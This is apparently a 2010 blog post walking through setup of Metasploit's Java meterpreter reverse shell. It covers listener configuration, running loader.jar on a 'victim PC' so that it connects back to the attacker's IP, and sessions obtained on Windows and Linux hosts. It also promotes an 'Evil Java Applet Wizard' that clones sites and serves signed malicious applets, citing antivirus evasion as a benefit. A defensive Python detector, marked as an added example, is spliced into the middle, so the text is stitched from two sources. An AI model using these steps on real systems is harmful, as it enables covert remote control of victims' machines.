Metasploit Java Meterpreter Payload
If you haven’t noticed, the Metasploit Framework has had a Java meterpreter payload for some time now.
It supports all the commands supported by the PHP meterpreter, as of SVN revision 9777, and additionally the ipconfig, route, and screenshot commands.
It is not fully implemented into the framework yet and in order to get it up and running some manual tweaking is needed.
In this post I will show how to set it up and use it.
Furthermore, I have recreated my “Evil java applet wizard” to automate the process of getting it up and running.
The script now supports a full Java attack which includes the client side applet attack and uses the meterpreter Java payload instead of a binary executable.
Why use a Java meterpreter, you ask?
Well…you’ll see later…
Requirements:
JRE 1.2 on the victim machine is enough, although some features, like routing tables or screenshots, require JRE 1.3, JRE 1.4 or JRE 1.6.
You can find the java meterpreter payload jar file in:
"/pentest/exploits/framework3/data/java/loader.jar"
You will also need the “JavaMeterpreter.zip” file which you can download from HERE
I have just noticed that manual tweaking is no longer necessary: the Metasploit framework now has the Java meterpreter listener built in.
That means you can skip steps 1 to 4, and instead of using the patched PHP meterpreter you can use the Java meterpreter directly.
I have also updated the script to use the Java payload as well.
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 578 exploits - 297 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r10024 updated today (2010.08.17)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) >
Let's see how to set it up manually...
1. Download
root@Blackbox:~# cd /tmp/
root@Blackbox:/tmp# wget https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip --no-check-certificate
2. Unzip
root@Blackbox:/tmp# unzip JavaMeterpreter.zip
3. Copy necessary files
root@Blackbox:/tmp# cd extensions/
root@Blackbox:/tmp/extensions# cp {ext_server_stdapi.jar,meterpreter.jar} /pentest/exploits/framework3/data/meterpreter
4. Back up the PHP Meterpreter files and change the jar file extensions to php (this will break PHP Meterpreter support)
root@Blackbox:/tmp/extensions# cd /pentest/exploits/framework3/data/meterpreter
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.php meterpreter.phpx
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.php ext_server_stdapi.phpx
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.jar meterpreter.php
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.jar ext_server_stdapi.php
5. Launch msfconsole and setup a multi/handler listener with a "php/meterpreter/reverse_tcp" payload.
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# cd ..
root@Blackbox:/pentest/exploits/framework3/data# cd ..
root@Blackbox:/pentest/exploits/framework3# ./msfconsole
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 577 exploits - 295 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9993 updated today (2010.08.13)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
6. Copy (transfer) “/pentest/exploits/framework3/data/java/loader.jar” to the victim PC and run it as follows
C:\Documents and Settings\NightRanger>java -jar loader.jar
Usage: java -jar loader.jar []
C:\Documents and Settings\NightRanger>java -jar loader.jar 192.168.1.104 4444
7. Get your Meterpreter JAVA Shell…
[*] Sending stage (21717 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.106:1435) at Sat Aug 14 20:34:57 +0300 2010
meterpreter > sysinfo
Computer: exploit
OS : Windows XP 5.1 (x86)
meterpreter > getuid
Server username: NightRanger
meterpreter >
P.S:
The Java meterpreter will work on Linux systems as well...
root@Blackbox:/pentest/exploits/framework3/data/java# java -jar loader.jar 192.168.1.104 4444
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > rexploit
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (21717 bytes) to 192.168.1.104
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.104:59806) at Sat Aug 14 20:47:40 +0300 2010
meterpreter > sysinfo
Computer: Blackbox
OS : Linux 2.6.34 (i386)
meterpreter > getuid
Server username: root
meterpreter >
I have modified my “Evil Java Applet Wizard” script to use the JAVA Meterpreter Payload instead of a binary executable.
The reasons for that are:
1. Antivirus software will not detect the Java Meterpreter as a malicious file (as you can see in the demo video below).
2. It makes sense to use the Java Meterpreter payload if you are already using the Java applet client side attack vector.
If the applet attack worked, it means that the victim has Java installed on his system, which allows us to use this payload.
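Since the post notes that antivirus will not flag the Java stager as a file, the useful defensive signal is behavioural: the stager is launched as "java -jar loader.jar <host> <port>", and in the applet vector that java process is spawned by a browser. The following detector, an added example that is not part of the original post or of the author's script, triages constructed Sysmon-style process-creation events for exactly those two traits. The event field names (host, image, cmdline, parent) and the sample events are assumptions made for the example.

```python
"""Heuristic triage of process-creation events for a Java stager launch.

Two traits from the post are used as signals:
  1. a JAR started with an IPv4 literal and a port as positional arguments
     (the loader.jar invocation shown in the post), and
  2. java being spawned by a browser process (the applet delivery vector).
Field names below are assumed (Sysmon-like), not a real schema.
"""
import re
from typing import Dict, List, Tuple

IPV4 = r"(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)"
# "-jar <anything>.jar <ipv4> <port>" followed by whitespace or end of line
JAR_WITH_HOST_PORT = re.compile(
    rf"-jar\s+\S+\.jar\s+(?P<host>{IPV4})\s+(?P<port>\d{{1,5}})(?:\s|$)",
    re.IGNORECASE,
)
BROWSER_PARENTS = ("iexplore.exe", "firefox.exe", "chrome.exe", "firefox", "chromium")
JAVA_IMAGES = ("java.exe", "javaw.exe", "/java")

# Constructed sample events (not real telemetry): two benign, two matching the pattern.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Program Files\Java\jre6\bin\java.exe",
     "cmdline": r"java -jar loader.jar 192.168.1.104 4444",
     "parent": r"C:\Windows\explorer.exe"},
    {"host": "ws02", "image": r"C:\Program Files\Java\jre6\bin\java.exe",
     "cmdline": r"java -jar C:\tools\build.jar --config prod.yml",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"host": "ws03", "image": r"C:\Program Files\Java\jre6\bin\java.exe",
     "cmdline": r"java -jar C:\Users\bob\AppData\Local\Temp\loader.jar 10.0.0.5 443",
     "parent": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"host": "srv01", "image": "/usr/bin/java",
     "cmdline": "java -jar /opt/app/app.jar",
     "parent": "/bin/bash"},
]


def _basename(path: str) -> str:
    """Last path component, normalised for Windows and POSIX separators."""
    return path.replace("\\", "/").lower().rsplit("/", 1)[-1]


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the list of reasons an event looks like a Java stager launch.

    An empty list means no signal fired. Non-java images are ignored outright.
    """
    reasons: List[str] = []
    image = ev.get("image", "").lower()
    if not image.endswith(JAVA_IMAGES):
        return reasons

    m = JAR_WITH_HOST_PORT.search(ev.get("cmdline", ""))
    if m and 1 <= int(m.group("port")) <= 65535:
        reasons.append(f"jar launched with host/port args {m.group('host')}:{m.group('port')}")

    parent = _basename(ev.get("parent", ""))
    if parent in BROWSER_PARENTS:
        reasons.append(f"java spawned by browser process {parent}")
    return reasons


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (host, reasons) for every event with at least one signal."""
    hits = []
    for ev in events:
        reasons = analyze_event(ev)
        if reasons:
            hits.append((ev["host"], reasons))
    return hits


if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS):
        print(host, "->", "; ".join(reasons))
```

The host/port match is deliberately generic rather than keyed on the file name "loader.jar", since that name is trivially changed; the browser-parent check fires independently, so the two signals corroborate each other when both are present (ws03) and either one alone still surfaces the event for review (ws01).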
Demo:
Metasploit JAVA Meterpreter from NightRanger on Vimeo.
Script requirements are:
#!/usr/bin/python
'''
Created on Jul 4, 2010
Code Updated on Aug 17, 2010
@Author: NightRanger, http://exploit.co.il

This script designed and tested on BackTrack 4 final with metasploit v3.4.2-dev

Requirements:
JAVA JDK: Install using: "apt-get install sun-java6-jdk"
Meterpreter JAVA Payload (loader.jar) must exist in: "/pentest/exploits/framework3/data/java/loader.jar"

Script features:
----------------
- Generates java applet code on the fly
- Generates Keystore / Keystore Removal
- Compiles applet code
- Package and signs JAR file
- Web site cloning
- Generates applet html code
- Creates a meterpreter JAVA payload
- Starts apache web server
- Starts MSFConsole listener

* Java applet source code found in the wild, decompiled and tweaked.
* Website clone wget syntax taken from SET.
'''
Download the script :
The script is designed for attacking Windows operating systems.
References:
https://www.metasploit.com/redmine/issues/406
http://schierlm.users.sourceforge.net/JavaPayload/
http://www.metasploit.com/modules/payload/java/meterpreter/reverse_tcp
http://seclists.org/metasploit/2010/q3/134
LowValueTarget
Good Stuff!